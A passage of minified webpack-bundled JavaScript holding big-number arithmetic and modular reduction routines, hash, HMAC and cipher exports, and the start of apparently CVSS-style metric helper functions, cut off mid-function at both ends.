X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},2161:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(807),$=de(1447),ae=de(6890),I=de(4003);function Q(F){I.call(this,"digest"),this._hash=F}ie(Q,I),Q.prototype._update=function(F){this._hash.update(F)},Q.prototype._final=function(){return this._hash.digest()},Pe.exports=function(E){return"md5"===(E=E.toLowerCase())?new j:"rmd160"===E||"ripemd160"===E?new $:new Q(ae(E))}},6853:(Pe,we,de)=>{var ie=de(807);Pe.exports=function(j){return(new ie).update(j).digest()}},4295:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(1536),$=de(4003),ae=de(265).Buffer,I=de(6853),Q=de(1447),F=de(6890),E=ae.alloc(128);function g(b,_){$.call(this,"digest"),"string"==typeof _&&(_=ae.from(_));var y="sha512"===b||"sha384"===b?128:64;this._alg=b,this._key=_,_.length>y?_=("rmd160"===b?new Q:F(b)).update(_).digest():_.length<y&&(_=ae.concat([_,E],y));for(var p=this._ipad=ae.allocUnsafe(y),D=this._opad=ae.allocUnsafe(y),w=0;w<y;w++)p[w]=54^_[w],D[w]=92^_[w];this._hash="rmd160"===b?new Q:F(b),this._hash.update(p)}ie(g,$),g.prototype._update=function(b){this._hash.update(b)},g.prototype._final=function(){var b=this._hash.digest();return("rmd160"===this._alg?new Q:F(this._alg)).update(this._opad).update(b).digest()},Pe.exports=function(_,y){return"rmd160"===(_=_.toLowerCase())||"ripemd160"===_?new g("rmd160",y):"md5"===_?new j(I,y):new g(_,y)}},1536:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(265).Buffer,$=de(4003),ae=j.alloc(128),I=64;function Q(F,E){$.call(this,"digest"),"string"==typeof E&&(E=j.from(E)),this._alg=F,this._key=E,E.length>I?E=F(E):E.length<I&&(E=j.concat([E,ae],I));for(var g=this._ipad=j.allocUnsafe(I),b=this._opad=j.allocUnsafe(I),_=0;_<I;_++)g[_]=54^E[_],b[_]=92^E[_];this._hash=[g]}ie(Q,$),Q.prototype._update=function(F){this._hash.push(F)},Q.prototype._final=function(){var F=this._alg(j.concat(this._hash));return this._alg(j.concat([this._opad,F]))},Pe.exports=Q},882:(Pe,we,de)=>{"use strict";we.O6=de(2419),de(2161),de(4295);var j=de(2196),$=Object.keys(j),I=(["sha1","sha224","sha256","sha384","sha512","md5","rmd160"].concat($),de(8597));we.Sf=I.pbkdf2Sync;var Q=de(4271);we.CW=Q.createCipheriv,we.G_=Q.createDecipheriv;de(782),de(9494);de(4707);de(8831),de(3478)},306:function(Pe){"undefined"!=typeof self&&self,Pe.exports=function(we){var de={};function ie(j){if(de[j])return de[j].exports;var $=de[j]={i:j,l:!1,exports:{}};return we[j].call($.exports,$,$.exports,ie),$.l=!0,$.exports}return ie.m=we,ie.c=de,ie.d=function(j,$,ae){ie.o(j,$)||Object.defineProperty(j,$,{enumerable:!0,get:ae})},ie.r=function(j){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(j,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(j,"__esModule",{value:!0})},ie.t=function(j,$){if(1&$&&(j=ie(j)),8&$||4&$&&"object"==typeof j&&j&&j.__esModule)return j;var ae=Object.create(null);if(ie.r(ae),Object.defineProperty(ae,"default",{enumerable:!0,value:j}),2&$&&"string"!=typeof j)for(var I in j)ie.d(ae,I,function(Q){return j[Q]}.bind(null,I));return ae},ie.n=function(j){var $=j&&j.__esModule?function(){return j.default}:function(){return j};return ie.d($,"a",$),$},ie.o=function(j,$){return Object.prototype.hasOwnProperty.call(j,$)},ie.p="",ie(ie.s=1)}([function(we,de){function ie($,ae){return function(I){if(Array.isArray(I))return I}($)||function(I,Q){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(I)){var F=[],E=!0,g=!1,b=void 0;try{for(var _,y=I[Symbol.iterator]();!(E=(_=y.next()).done)&&(F.push(_.value),!Q||F.length!==Q);E=!0);}catch(M){g=!0,b=M}finally{try{E||null==y.return||y.return()}finally{if(g)throw b}}return F}}($,ae)||function(I,Q){if(I){if("string"==typeof I)return j(I,Q);var F=Object.prototype.toString.call(I).slice(8,-1);if("Object"===F&&I.constructor&&(F=I.constructor.name),"Map"===F||"Set"===F)return Array.from(I);if("Arguments"===F||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(F))return j(I,Q)}}($,ae)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function j($,ae){(null==ae||ae>$.length)&&(ae=$.length);for(var I=0,Q=new Array(ae);I<ae;I++)Q[I]=$[I];return Q}de.getMetricCodeMap=function($){for(var ae=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},I={},Q=0,F=Object.entries($);Q<F.length;Q++){var E=ie(F[Q],2),g=E[0],b=E[1],_=ae[g]||g.split(" ").map(function(z){return z.charAt(0)}).join("").toUpperCase();I[_]={name:g};for(var y=0,M=Object.entries(b);y<M.length;y++){var D=ie(M[y],1)[0],w=ae[D]||D.split(" ").map(function(z){return z.charAt(0)}).join("").toUpperCase();I[_][w]=D}}for(var x=0,S=Object.entries(I);x<S.length;x++){var O=ie(S[x],2),U=O[0],K=O[1];U.length>1&&!I[U.charAt(0)]&&(I[U.charAt(0)]=K);for(var ee=0,se=Object.entries(K);ee<se.length;ee++){var ve=ie(se[ee],2),le=ve[0],ye=ve[1];le.length>1&&!K[le.charAt(0)]&&(K[le.charAt(0)]=ye)}}return I},de.roundUp=function($){return Math.ceil(Math.round(1e5*(10*$+Number.EPSILON))/1e5)/10},de.round=function($){return 